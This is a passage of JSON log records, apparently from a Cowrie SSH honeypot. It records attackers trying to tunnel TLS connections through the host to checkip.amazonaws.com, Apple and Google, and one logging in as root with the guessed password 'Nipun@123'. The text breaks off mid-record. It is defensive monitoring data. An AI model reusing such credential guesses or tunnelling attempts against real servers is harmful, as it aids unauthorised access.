{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.77.155.121","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x8f\\x12)\\xf7`\\xd2\\xb0\\xacc\\xd9w\\xad',\\x12\\xe6\\x8cT\\x14\\x8c\\x9abf\\xc9\\xf1;\\xd3\\xf2k>\\xbd\\xb3 \\x97,$\\xe1\\xa6%/\\xcf\\xe0c?\\tM\\xa7\\x0c\\x04\\xd7@Fa\\x89FO\\x90\\x8d\\r\\xc6\\xcd%\\xe1\\x16\\xd0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x1d\\xed\\x00\\xb0\\xa2\\xf9i\\xdc\\xc3@X\\x82\\x0f\\r\\xe9$\\xc6\\x15{\\xd5\\xcf`J\\x97\\x83\\xe5\\xdf]BE\\x19k\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.77.155.121:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x8f\\x12)\\xf7`\\xd2\\xb0\\xacc\\xd9w\\xad',\\x12\\xe6\\x8cT\\x14\\x8c\\x9abf\\xc9\\xf1;\\xd3\\xf2k>\\xbd\\xb3 \\x97,$\\xe1\\xa6%/\\xcf\\xe0c?\\tM\\xa7\\x0c\\x04\\xd7@Fa\\x89FO\\x90\\x8d\\r\\xc6\\xcd%\\xe1\\x16\\xd0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x1d\\xed\\x00\\xb0\\xa2\\xf9i\\xdc\\xc3@X\\x82\\x0f\\r\\xe9$\\xc6\\x15{\\xd5\\xcf`J\\x97\\x83\\xe5\\xdf]BE\\x19k\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T18:28:15.001070Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"194.0.234.21","src_port":52628,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:52628","sensor":"my-vps","timestamp":"2025-08-26T18:28:15.017594Z","session":"015207308d3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe6\\x85\\xdfO\\xc7\\xf7\\xc2\\x04\\xb6\\xbb\\x93\\xe7\\x7f\\xa5B\\x89(\\'\\xaf\\xb7A\\x00r\\xf1/0\\xc3\\xa8\\xbcO\\xf3@ @\\xba\\xd3N&\\x03\\xf4_\\x01\\xad\\x87\\xd2\\x8e\\xae\\xe2\\xf1\\x87\\xc0\\xf4\\xf4\"\\xee\\xd8\\xc7\\x1e\\xac\\xc8\\xac\\xb0\\xce\\xa3K\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 n\\xe3c\\n$\\x05\\x81\\xc5\\xc2\\xd8E|~\\x80#!\\xe66\\xec\\x13\\x9cu\\x15\\xae(\\xa5*C{e\\xf8[\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe6\\x85\\xdfO\\xc7\\xf7\\xc2\\x04\\xb6\\xbb\\x93\\xe7\\x7f\\xa5B\\x89(\\'\\xaf\\xb7A\\x00r\\xf1/0\\xc3\\xa8\\xbcO\\xf3@ @\\xba\\xd3N&\\x03\\xf4_\\x01\\xad\\x87\\xd2\\x8e\\xae\\xe2\\xf1\\x87\\xc0\\xf4\\xf4\"\\xee\\xd8\\xc7\\x1e\\xac\\xc8\\xac\\xb0\\xce\\xa3K\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 n\\xe3c\\n$\\x05\\x81\\xc5\\xc2\\xd8E|~\\x80#!\\xe66\\xec\\x13\\x9cu\\x15\\xae(\\xa5*C{e\\xf8[\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T18:28:15.054908Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.186.196","dst_port":443,"src_ip":"194.0.234.21","src_port":53094,"message":"direct-tcp connection request to 142.250.186.196:443 from 127.0.0.1:53094","sensor":"my-vps","timestamp":"2025-08-26T18:28:15.688988Z","session":"015207308d3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.186.196","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf9\\x1bN\\x96V\\x1d\\x13\\x13\\x04\\x93\\xf1\\xe5e#\\xb7S~\\x80ko\\x15h\\xad\\x8dm\\xe6\\xb8\\xf4\\xdfk\\x1bx \\x9f\\x04\\x03\\xe7a\\xd6p\\xa9\"\\x1c\\xea\\xfd,|\\xc5wv\\xd4E\\xadAp\\x99Y\\xfd\\xf4\\x8d\\xff\\xa8\\xceh\\xa2\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 @\\x1a\\xcc\\xb3b\\xc5\\t\\x95|0\\xc4\\x17\\xef\\xa6\\xf0\\xff1\\x9c4\\x18`!\\x9dY-\\xbaR#uk\\xc1~\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.186.196:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf9\\x1bN\\x96V\\x1d\\x13\\x13\\x04\\x93\\xf1\\xe5e#\\xb7S~\\x80ko\\x15h\\xad\\x8dm\\xe6\\xb8\\xf4\\xdfk\\x1bx \\x9f\\x04\\x03\\xe7a\\xd6p\\xa9\"\\x1c\\xea\\xfd,|\\xc5wv\\xd4E\\xadAp\\x99Y\\xfd\\xf4\\x8d\\xff\\xa8\\xceh\\xa2\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 @\\x1a\\xcc\\xb3b\\xc5\\t\\x95|0\\xc4\\x17\\xef\\xa6\\xf0\\xff1\\x9c4\\x18`!\\x9dY-\\xbaR#uk\\xc1~\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T18:28:15.751817Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:28:15.787224Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33488,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc7507d44fc4","protocol":"ssh","message":"New connection: 212.227.235.229:33488 (1.2.3.4:22) [session: cc7507d44fc4]","sensor":"my-vps","timestamp":"2025-08-26T18:28:19.930227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:28:20.490565Z","src_ip":"212.227.235.229","session":"cc7507d44fc4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:28:20.491327Z","src_ip":"212.227.235.229","session":"cc7507d44fc4"}
{"eventid":"cowrie.login.success","username":"root","password":"Nipun@123","message":"login attempt [root/Nipun@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:28:24.191538Z","src_ip":"212.227.235.229","session":"cc7507d44fc4"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:28:25.091352Z","src_ip":"212.227.235.229","session":"cc7507d44fc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40443,"dst_ip":"1.2.3.4","dst_port":22,"session":"b883a1dea7af","protocol":"ssh","message":"New connection: 212.227.125.160:40443 (1.2.3.4:22) [session: b883a1dea7af]","sensor":"my-vps","timestamp":"2025-08-26T18:28:58.289279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:28:58.290222Z","src_ip":"212.227.125.160","session":"b883a1dea7af"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfo